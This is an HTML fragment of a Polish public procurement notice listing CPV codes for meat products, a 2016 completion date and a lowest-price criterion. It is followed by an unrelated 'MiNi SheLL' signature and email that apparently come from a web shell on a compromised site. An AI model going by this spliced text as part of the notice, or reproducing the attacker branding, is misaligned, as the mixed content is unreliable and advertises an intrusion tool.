<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.13.10-1, 15.13.10.00-5, 15.11.10.00-9, 15.11.30.00-3, 15.11.11.00-0, 15.13.16.00-1, 15.13.11.34-3, 15.11.40.00-0, 15.41.21.00-0, 15.13.15.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com